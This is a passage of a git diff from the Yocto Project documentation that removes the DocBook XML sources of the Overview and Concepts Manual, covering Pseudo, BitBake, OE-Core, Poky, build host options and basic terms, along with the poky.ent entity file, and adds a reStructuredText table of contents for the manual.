- Both prelink and cross-prelink are maintained in the
- same repository albeit on separate branches.
- By providing an emulated runtime dynamic linker
- (i.e. <filename>glibc</filename>-derived
- <filename>ld.so</filename> emulation), the
- cross-prelink project extends the prelink software’s
- ability to prelink a sysroot environment.
- Additionally, the cross-prelink software enables the
- ability to work in sysroot style environments.</para>
-
- <para>The dynamic linker determines standard load
- address calculations based on a variety of factors
- such as mapping addresses, library usage, and library
- function conflicts.
- The prelink tool uses this information, from the
- dynamic linker, to determine unique load addresses
- for executable and linkable format (ELF) binaries
- that are shared libraries and dynamically linked.
- The prelink tool modifies these ELF binaries with the
- pre-computed information.
- The result is faster loading and often lower memory
- consumption because more of the library code can
- be re-used from shared Copy-On-Write (COW) pages.
- </para>
-
- <para>The original upstream prelink project only
- supports running prelink on the end target device
- due to the reliance on the target device’s dynamic
- linker.
- This restriction causes issues when developing a
- cross-compiled system.
- The cross-prelink adds a synthesized dynamic loader
- that runs on the host, thus permitting cross-prelinking
- without ever having to run on a read-write target
- filesystem.
- </para></listitem>
- <listitem><para>
- <emphasis>Pseudo:</emphasis>
- Pseudo is the Yocto Project implementation of
- <ulink url='http://man.he.net/man1/fakeroot'>fakeroot</ulink>,
- which is used to run commands in an environment
- that seemingly has root privileges.</para>
-
- <para>During a build, it can be necessary to perform
- operations that require system administrator
- privileges.
- For example, file ownership or permissions might need
- definition.
- Pseudo is a tool that you can either use directly or
- through the environment variable
- <filename>LD_PRELOAD</filename>.
- Either method allows these operations to succeed as
- if system administrator privileges exist even
- when they do not.</para>
-
- <para>You can read more about Pseudo in the
- "<link linkend='fakeroot-and-pseudo'>Fakeroot and Pseudo</link>"
- section.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='gs-openembedded-build-system'>
- <title>Open-Embedded Build System Components</title>
-
- <para>
- The following list consists of components associated with the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>:
- <itemizedlist>
- <listitem><para>
- <emphasis>BitBake:</emphasis>
- BitBake is a core component of the Yocto Project and is
- used by the OpenEmbedded build system to build images.
- While BitBake is key to the build system, BitBake
- is maintained separately from the Yocto Project.</para>
-
- <para>BitBake is a generic task execution engine that
- allows shell and Python tasks to be run efficiently
- and in parallel while working within complex inter-task
- dependency constraints.
- In short, BitBake is a build engine that works
- through recipes written in a specific format in order
- to perform sets of tasks.</para>
-
- <para>You can learn more about BitBake in the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>OpenEmbedded-Core:</emphasis>
- OpenEmbedded-Core (OE-Core) is a common layer of
- metadata (i.e. recipes, classes, and associated files)
- used by OpenEmbedded-derived systems, which includes
- the Yocto Project.
- The Yocto Project and the OpenEmbedded Project both
- maintain the OpenEmbedded-Core.
- You can find the OE-Core metadata in the Yocto Project
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta'>Source Repositories</ulink>.
- </para>
-
- <para>Historically, the Yocto Project integrated the
- OE-Core metadata throughout the Yocto Project
- source repository reference system (Poky).
- After Yocto Project Version 1.0, the Yocto Project
- and OpenEmbedded agreed to work together and share a
- common core set of metadata (OE-Core), which contained
- much of the functionality previously found in Poky.
- This collaboration achieved a long-standing
- OpenEmbedded objective for having a more tightly
- controlled and quality-assured core.
- The results also fit well with the Yocto Project
- objective of achieving a smaller number of fully
- featured tools as compared to many different ones.
- </para>
-
- <para>Sharing a core set of metadata results in Poky
- as an integration layer on top of OE-Core.
- You can see that in this
- <link linkend='yp-key-dev-elements'>figure</link>.
- The Yocto Project combines various components such as
- BitBake, OE-Core, script “glueâ€, and documentation
- for its build system.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='gs-reference-distribution-poky'>
- <title>Reference Distribution (Poky)</title>
-
- <para>
- Poky is the Yocto Project reference distribution.
- It contains the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>Open-Embedded build system</ulink>
- (BitBake and OE-Core) as well as a set of metadata to get you
- started building your own distribution.
- See the
- <link linkend='what-is-the-yocto-project'>figure</link> in
- "What is the Yocto Project?" section for an illustration
- that shows Poky and its relationship with other parts of the
- Yocto Project.</para>
-
- <para>To use the Yocto Project tools and components, you
- can download (<filename>clone</filename>) Poky and use it
- to bootstrap your own distribution.
- <note>
- Poky does not contain binary files.
- It is a working example of how to build your own custom
- Linux distribution from source.
- </note>
- You can read more about Poky in the
- "<link linkend='reference-embedded-distribution'>Reference Embedded Distribution (Poky)</link>"
- section.
- </para>
- </section>
-
- <section id='gs-packages-for-finished-targets'>
- <title>Packages for Finished Targets</title>
-
- <para>
- The following lists components associated with packages
- for finished targets:
- <itemizedlist>
- <listitem><para>
- <emphasis>Matchbox:</emphasis>
- Matchbox is an Open Source, base environment for the
- X Window System running on non-desktop, embedded
- platforms such as handhelds, set-top boxes, kiosks,
- and anything else for which screen space, input
- mechanisms, or system resources are limited.</para>
-
- <para>Matchbox consists of a number of interchangeable
- and optional applications that you can tailor to a
- specific, non-desktop platform to enhance usability
- in constrained environments.</para>
-
- <para>You can find the Matchbox source in the Yocto
- Project
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Opkg</emphasis>
- Open PacKaGe management (opkg) is a lightweight
- package management system based on the itsy package
- (ipkg) management system.
- Opkg is written in C and resembles Advanced Package
- Tool (APT) and Debian Package (dpkg) in operation.
- </para>
-
- <para>Opkg is intended for use on embedded Linux
- devices and is used in this capacity in the
- <ulink url='http://www.openembedded.org/wiki/Main_Page'>OpenEmbedded</ulink>
- and
- <ulink url='https://openwrt.org/'>OpenWrt</ulink>
- projects, as well as the Yocto Project.
- <note>
- As best it can, opkg maintains backwards
- compatibility with ipkg and conforms to a subset
- of Debian’s policy manual regarding control files.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='gs-archived-components'>
- <title>Archived Components</title>
-
- <para>
- The Build Appliance is a virtual machine image that enables
- you to build and boot a custom embedded Linux image with
- the Yocto Project using a non-Linux development system.
- </para>
-
- <para>
- Historically, the Build Appliance was the second of three
- methods by which you could use the Yocto Project on a system
- that was not native to Linux.
- <orderedlist>
- <listitem><para>
- <emphasis>Hob:</emphasis>
- Hob, which is now deprecated and is no longer available
- since the 2.1 release of the Yocto Project provided
- a rudimentary, GUI-based interface to the Yocto
- Project.
- Toaster has fully replaced Hob.
- </para></listitem>
- <listitem><para>
- <emphasis>Build Appliance:</emphasis>
- Post Hob, the Build Appliance became available.
- It was never recommended that you use the Build
- Appliance as a day-to-day production development
- environment with the Yocto Project.
- Build Appliance was useful as a way to try out
- development in the Yocto Project environment.
- </para></listitem>
- <listitem><para>
- <emphasis>CROPS:</emphasis>
- The final and best solution available now for
- developing using the Yocto Project on a system
- not native to Linux is with
- <link linkend='gs-crops-overview'>CROPS</link>.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
-
- <section id='gs-development-methods'>
- <title>Development Methods</title>
-
- <para>
- The Yocto Project development environment usually involves a
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>Build Host</ulink>
- and target hardware.
- You use the Build Host to build images and develop applications,
- while you use the target hardware to test deployed software.
- </para>
-
- <para>
- This section provides an introduction to the choices or
- development methods you have when setting up your Build Host.
- Depending on the your particular workflow preference and the
- type of operating system your Build Host runs, several choices
- exist that allow you to use the Yocto Project.
- <note>
- For additional detail about the Yocto Project development
- environment, see the
- "<link linkend='overview-development-environment'>The Yocto Project Development Environment</link>"
- chapter.
- </note>
- <itemizedlist>
- <listitem><para>
- <emphasis>Native Linux Host:</emphasis>
- By far the best option for a Build Host.
- A system running Linux as its native operating system
- allows you to develop software by directly using the
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- tool.
- You can accomplish all aspects of development from a
- familiar shell of a supported Linux distribution.</para>
-
- <para>For information on how to set up a Build Host on
- a system running Linux as its native operating system,
- see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-a-native-linux-host'>Setting Up a Native Linux Host</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>CROss PlatformS (CROPS):</emphasis>
- Typically, you use
- <ulink url='https://github.com/crops/poky-container/'>CROPS</ulink>,
- which leverages
- <ulink url='https://www.docker.com/'>Docker Containers</ulink>,
- to set up a Build Host that is not running Linux (e.g.
- <trademark class='registered'>Microsoft</trademark>
- <trademark class='trademark'>Windows</trademark>
- or
- <trademark class='registered'>macOS</trademark>).
- <note>
- You can, however, use CROPS on a Linux-based system.
- </note>
- CROPS is an open source, cross-platform development
- framework that provides an easily managed, extensible
- environment for building binaries targeted for a variety
- of architectures on Windows, macOS, or Linux hosts.
- Once the Build Host is set up using CROPS, you can prepare
- a shell environment to mimic that of a shell being used
- on a system natively running Linux.</para>
-
- <para>For information on how to set up a Build Host with
- CROPS, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-crops'>Setting Up to Use CROss PlatformS (CROPS)</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Windows Subsystem For Linux (WSLv2):</emphasis>
- You may use Windows Subsystem For Linux v2 to set up a build
- host using Windows 10.
- <note>
- The Yocto Project is not compatible with WSLv1, it is
- compatible but not officially supported nor validated
- with WSLv2, if you still decide to use WSL please upgrade
- to WSLv2.
- </note>
- The Windows Subsystem For Linux allows Windows 10 to run a real
- Linux kernel inside of a lightweight utility virtual
- machine (VM) using virtualization technology.</para>
- <para>For information on how to set up a Build Host with
- WSLv2, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-wsl'>Setting Up to Use Windows Subsystem For Linux</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Toaster:</emphasis>
- Regardless of what your Build Host is running, you can
- use Toaster to develop software using the Yocto Project.
- Toaster is a web interface to the Yocto Project's
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>Open-Embedded build system</ulink>.
- The interface enables you to configure and run your
- builds.
- Information about builds is collected and stored in a
- database.
- You can use Toaster to configure and start builds on
- multiple remote build servers.</para>
-
- <para>For information about and how to use Toaster,
- see the
- <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='reference-embedded-distribution'>
- <title>Reference Embedded Distribution (Poky)</title>
-
- <para>
- "Poky", which is pronounced <emphasis>Pock</emphasis>-ee, is the
- name of the Yocto Project's reference distribution or Reference OS
- Kit.
- Poky contains the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded Build System</ulink>
- (<ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink> and
- <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core</ulink>)
- as well as a set of
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>metadata</ulink> to get
- you started building your own distro.
- In other words, Poky is a base specification of the functionality
- needed for a typical embedded system as well as the components
- from the Yocto Project that allow you to build a distribution into
- a usable binary image.
- </para>
-
- <para>
- Poky is a combined repository of BitBake, OpenEmbedded-Core
- (which is found in <filename>meta</filename>),
- <filename>meta-poky</filename>,
- <filename>meta-yocto-bsp</filename>, and documentation provided
- all together and known to work well together.
- You can view these items that make up the Poky repository in the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/'>Source Repositories</ulink>.
- <note>
- If you are interested in all the contents of the
- <filename>poky</filename> Git repository, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#structure-core'>Top-Level Core Components</ulink>"
- section in the Yocto Project Reference Manual.
- </note>
- </para>
-
- <para id='gs-poky-reference-distribution'>
- The following figure illustrates what generally comprises Poky:
- <imagedata fileref="figures/poky-reference-distribution.png" format="PNG" align='center' width="8in"/>
- <itemizedlist>
- <listitem><para>
- BitBake is a task executor and scheduler that is the heart of
- the OpenEmbedded build system.
- </para></listitem>
- <listitem><para>
- <filename>meta-poky</filename>, which is Poky-specific
- metadata.
- </para></listitem>
- <listitem><para>
- <filename>meta-yocto-bsp</filename>, which are Yocto
- Project-specific Board Support Packages (BSPs).
- </para></listitem>
- <listitem><para>
- OpenEmbedded-Core (OE-Core) metadata, which includes
- shared configurations, global variable definitions,
- shared classes, packaging, and recipes.
- Classes define the encapsulation and inheritance of build
- logic.
- Recipes are the logical units of software and images
- to be built.
- </para></listitem>
- <listitem><para>
- Documentation, which contains the Yocto Project source
- files used to make the set of user manuals.
- </para></listitem>
- </itemizedlist>
- <note>
- While Poky is a "complete" distribution specification and is
- tested and put through QA, you cannot use it as a product
- "out of the box" in its current form.
- </note>
- </para>
-
- <para>
- To use the Yocto Project tools, you can use Git to clone (download)
- the Poky repository then use your local copy of the reference
- distribution to bootstrap your own distribution.
- <note>
- Poky does not contain binary files.
- It is a working example of how to build your own custom Linux distribution
- from source.
- </note>
- </para>
-
- <para>
- Poky has a regular, well established, six-month release cycle
- under its own version.
- Major releases occur at the same time major releases (point
- releases) occur for the Yocto Project, which are typically in the
- Spring and Fall.
- For more information on the Yocto Project release schedule and
- cadence, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-release-process'>Yocto Project Releases and the Stable Release Process</ulink>"
- chapter in the Yocto Project Reference Manual.
- </para>
-
- <para>
- Much has been said about Poky being a "default configuration."
- A default configuration provides a starting image footprint.
- You can use Poky out of the box to create an image ranging from a
- shell-accessible minimal image all the way up to a Linux
- Standard Base-compliant image that uses a GNOME Mobile and
- Embedded (GMAE) based reference user interface called Sato.
- </para>
-
- <para>
- One of the most powerful properties of Poky is that every aspect
- of a build is controlled by the metadata.
- You can use metadata to augment these base image types by
- adding metadata
- <link linkend='the-yocto-project-layer-model'>layers</link>
- that extend functionality.
- These layers can provide, for example, an additional software
- stack for an image type, add a board support package (BSP) for
- additional hardware, or even create a new image type.
- </para>
-
- <para>
- Metadata is loosely grouped into configuration files or package
- recipes.
- A recipe is a collection of non-executable metadata used by
- BitBake to set variables or define additional build-time tasks.
- A recipe contains fields such as the recipe description, the recipe
- version, the license of the package and the upstream source
- repository.
- A recipe might also indicate that the build process uses autotools,
- make, distutils or any other build process, in which case the basic
- functionality can be defined by the classes it inherits from
- the OE-Core layer's class definitions in
- <filename>./meta/classes</filename>.
- Within a recipe you can also define additional tasks as well as
- task prerequisites.
- Recipe syntax through BitBake also supports both
- <filename>_prepend</filename> and <filename>_append</filename>
- operators as a method of extending task functionality.
- These operators inject code into the beginning or end of a task.
- For information on these BitBake operators, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#appending-and-prepending-override-style-syntax'>Appending and Prepending (Override Style Syntax)</ulink>"
- section in the BitBake User's Manual.
- </para>
- </section>
-
- <section id='openembedded-build-system-workflow'>
- <title>The OpenEmbedded Build System Workflow</title>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- uses a "workflow" to accomplish image and SDK generation.
- The following figure overviews that workflow:
- <imagedata fileref="figures/YP-flow-diagram.png"
- format="PNG" align='center' width="8in"/>
- Following is a brief summary of the "workflow":
- <orderedlist>
- <listitem><para>
- Developers specify architecture, policies, patches and
- configuration details.
- </para></listitem>
- <listitem><para>
- The build system fetches and downloads the source code
- from the specified location.
- The build system supports standard methods such as tarballs
- or source code repositories systems such as Git.
- </para></listitem>
- <listitem><para>
- Once source code is downloaded, the build system extracts
- the sources into a local work area where patches are
- applied and common steps for configuring and compiling
- the software are run.
- </para></listitem>
- <listitem><para>
- The build system then installs the software into a
- temporary staging area where the binary package format you
- select (DEB, RPM, or IPK) is used to roll up the software.
- </para></listitem>
- <listitem><para>
- Different QA and sanity checks run throughout entire
- build process.
- </para></listitem>
- <listitem><para>
- After the binaries are created, the build system
- generates a binary package feed that is used to create
- the final root file image.
- </para></listitem>
- <listitem><para>
- The build system generates the file system image and a
- customized Extensible SDK (eSDK) for application
- development in parallel.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- For a very detailed look at this workflow, see the
- "<link linkend='openembedded-build-system-build-concepts'>OpenEmbedded Build System Concepts</link>"
- section.
- </para>
- </section>
-
-
- <section id='some-basic-terms'>
- <title>Some Basic Terms</title>
-
- <para>
- It helps to understand some basic fundamental terms when
- learning the Yocto Project.
- Although a list of terms exists in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-terms'>Yocto Project Terms</ulink>"
- section of the Yocto Project Reference Manual, this section
- provides the definitions of some terms helpful for getting started:
- <itemizedlist>
- <listitem><para>
- <emphasis>Configuration Files:</emphasis>
- Files that hold global definitions of variables,
- user-defined variables, and hardware configuration
- information.
- These files tell the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>Open-Embedded build system</ulink>
- what to build and what to put into the image to support a
- particular platform.
- </para></listitem>
- <listitem><para>
- <emphasis>Extensible Software Development Kit (eSDK):</emphasis>
- A custom SDK for application developers.
- This eSDK allows developers to incorporate their library
- and programming changes back into the image to make
- their code available to other application developers.
- For information on the eSDK, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Layer:</emphasis>
- A collection of related recipes.
- Layers allow you to consolidate related metadata to
- customize your build.
- Layers also isolate information used when building
- for multiple architectures.
- Layers are hierarchical in their ability to override
- previous specifications.
- You can include any number of available layers from the
- Yocto Project and customize the build by adding your
- layers after them.
- You can search the Layer Index for layers used within
- Yocto Project.</para>
-
- <para>For more detailed information on layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For a discussion specifically on BSP Layers, see the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
- section in the Yocto Project Board Support Packages (BSP)
- Developer's Guide.
- </para></listitem>
- <listitem><para>
- <emphasis>Metadata:</emphasis>
- A key element of the Yocto Project is the Metadata that
- is used to construct a Linux distribution and is contained
- in the files that the OpenEmbedded build system parses
- when building an image.
- In general, Metadata includes recipes, configuration
- files, and other information that refers to the build
- instructions themselves, as well as the data used to
- control what things get built and the effects of the
- build.
- Metadata also includes commands and data used to
- indicate what versions of software are used, from
- where they are obtained, and changes or additions to the
- software itself (patches or auxiliary files) that
- are used to fix bugs or customize the software for use
- in a particular situation.
- OpenEmbedded-Core is an important set of validated
- metadata.
- </para></listitem>
- <listitem><para id='gs-term-openembedded-build-system'>
- <emphasis>OpenEmbedded Build System:</emphasis>
- The terms "BitBake" and "build system" are sometimes
- used for the OpenEmbedded Build System.</para>
-
- <para>BitBake is a task scheduler and execution engine
- that parses instructions (i.e. recipes) and configuration
- data.
- After a parsing phase, BitBake creates a dependency tree
- to order the compilation, schedules the compilation of
- the included code, and finally executes the building
- of the specified custom Linux image (distribution).
- BitBake is similar to the <filename>make</filename>
- tool.</para>
-
- <para>During a build process, the build system tracks
- dependencies and performs a native or cross-compilation
- of the package.
- As a first step in a cross-build setup, the framework
- attempts to create a cross-compiler toolchain
- (i.e. Extensible SDK) suited for the target platform.
- </para></listitem>
- <listitem><para>
- <emphasis>OpenEmbedded-Core (OE-Core):</emphasis>
- OE-Core is metadata comprised of foundation recipes,
- classes, and associated files that are meant to be
- common among many different OpenEmbedded-derived systems,
- including the Yocto Project.
- OE-Core is a curated subset of an original repository
- developed by the OpenEmbedded community that has been
- pared down into a smaller, core set of continuously
- validated recipes.
- The result is a tightly controlled and quality-assured
- core set of recipes.</para>
-
- <para>You can see the Metadata in the
- <filename>meta</filename> directory of the Yocto Project
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Source Repositories</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Packages:</emphasis>
- In the context of the Yocto Project, this term refers to a
- recipe's packaged output produced by BitBake (i.e. a
- "baked recipe").
- A package is generally the compiled binaries produced from the
- recipe's sources.
- You "bake" something by running it through BitBake.</para>
-
- <para>It is worth noting that the term "package" can,
- in general, have subtle meanings.
- For example, the packages referred to in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-build-host'>Required Packages for the Build Host</ulink>"
- section in the Yocto Project Reference Manual are compiled
- binaries that, when installed, add functionality to your
- Linux distribution.</para>
-
- <para>Another point worth noting is that historically within
- the Yocto Project, recipes were referred to as packages - thus,
- the existence of several BitBake variables that are seemingly
- mis-named,
- (e.g. <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>).
- </para></listitem>
- <listitem><para>
- <emphasis>Poky:</emphasis>
- Poky is a reference embedded distribution and a reference
- test configuration.
- Poky provides the following:
- <itemizedlist>
- <listitem><para>
- A base-level functional distro used to illustrate
- how to customize a distribution.
- </para></listitem>
- <listitem><para>
- A means by which to test the Yocto Project
- components (i.e. Poky is used to validate
- the Yocto Project).
- </para></listitem>
- <listitem><para>
- A vehicle through which you can download
- the Yocto Project.
- </para></listitem>
- </itemizedlist>
- Poky is not a product level distro.
- Rather, it is a good starting point for customization.
- <note>
- Poky is an integration layer on top of OE-Core.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Recipe:</emphasis>
- The most common form of metadata.
- A recipe contains a list of settings and tasks
- (i.e. instructions) for building packages that are then
- used to build the binary image.
- A recipe describes where you get source code and which
- patches to apply.
- Recipes describe dependencies for libraries or for other
- recipes as well as configuration and compilation options.
- Related recipes are consolidated into a layer.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual.rst b/documentation/overview-manual/overview-manual.rst
new file mode 100644
index 0000000000..f20b20e328
--- /dev/null
+++ b/documentation/overview-manual/overview-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+==========================================
+Yocto Project Overview and Concepts Manual
+==========================================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ overview-manual-intro
+ overview-manual-yp-intro
+ overview-manual-development-environment
+ overview-manual-concepts
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/overview-manual/overview-manual.xml b/documentation/overview-manual/overview-manual.xml
deleted file mode 100755
index 7c75e5086c..0000000000
--- a/documentation/overview-manual/overview-manual.xml
+++ /dev/null
@@ -1,149 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='overview-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/overview-manual-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Overview and Concepts Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>The initial document released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">
- Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by
- Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Overview and Concepts Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="overview-manual-intro.xml"/>
-
- <xi:include href="overview-manual-yp-intro.xml"/>
-
- <xi:include href="overview-manual-development-environment.xml"/>
-
- <xi:include href="overview-manual-concepts.xml" />
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/poky.ent b/documentation/poky.ent
deleted file mode 100755
index 7c00d3a41b..0000000000
--- a/documentation/poky.ent
+++ /dev/null
@@ -1,89 +0,0 @@
-<!ENTITY DISTRO "3.1.4">
-<!ENTITY DISTRO_COMPRESSED "314">
-<!ENTITY DISTRO_NAME_NO_CAP "dunfell">
-<!ENTITY DISTRO_NAME "Dunfell">
-<!ENTITY DISTRO_NAME_NO_CAP_MINUS_ONE "zeus">
-<!ENTITY DISTRO_NAME_MINUS_ONE "Zeus">
-<!ENTITY YOCTO_DOC_VERSION "3.1.4">
-<!ENTITY YOCTO_DOC_VERSION_MINUS_ONE "3.0.2">
-<!ENTITY DISTRO_REL_TAG "yocto-3.1.4">
-<!ENTITY METAINTELVERSION "12.0">
-<!ENTITY REL_MONTH_YEAR "November 2020">
-<!ENTITY META_INTEL_REL_TAG "&METAINTELVERSION;-&DISTRO_NAME_NO_CAP;-&YOCTO_DOC_VERSION;">
-<!ENTITY POKYVERSION "23.0.4">
-<!ENTITY POKYVERSION_COMPRESSED "2304">
-<!ENTITY YOCTO_POKY "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;">
-<!ENTITY COPYRIGHT_YEAR "2010-2020">
-<!ENTITY ORGNAME "The Yocto Project">
-<!ENTITY ORGEMAIL "docs@lists.yoctoproject.org">
-<!ENTITY YOCTO_DL_URL "http://downloads.yoctoproject.org">
-<!ENTITY YOCTO_HOME_URL "http://www.yoctoproject.org">
-<!ENTITY YOCTO_LISTS_URL "http://lists.yoctoproject.org">
-<!ENTITY YOCTO_BUGZILLA_URL "http://bugzilla.yoctoproject.org">
-<!ENTITY YOCTO_WIKI_URL "https://wiki.yoctoproject.org">
-<!ENTITY YOCTO_AB_URL "http://autobuilder.yoctoproject.org">
-<!ENTITY YOCTO_GIT_URL "http://git.yoctoproject.org">
-<!ENTITY YOCTO_ADTREPO_URL "http://adtrepo.yoctoproject.org">
-<!ENTITY OE_HOME_URL "http://www.openembedded.org">
-<!ENTITY OE_LISTS_URL "http://lists.openembedded.org/mailman">
-<!ENTITY OE_DOCS_URL "http://docs.openembedded.org">
-<!ENTITY OH_HOME_URL "http://o-hand.com">
-<!ENTITY BITBAKE_HOME_URL "http://developer.berlios.de/projects/bitbake/">
-<!ENTITY YOCTO_DOCS_URL "&YOCTO_HOME_URL;/docs">
-<!ENTITY YOCTO_SOURCES_URL "&YOCTO_HOME_URL;/sources/">
-<!ENTITY YOCTO_AB_PORT_URL "https://autobuilder.yocto.io/">
-<!ENTITY YOCTO_AB_NIGHTLY_URL "&YOCTO_AB_PORT_URL;/pub/nightly/">
-<!ENTITY YOCTO_POKY_URL "&YOCTO_DL_URL;/releases/poky/">
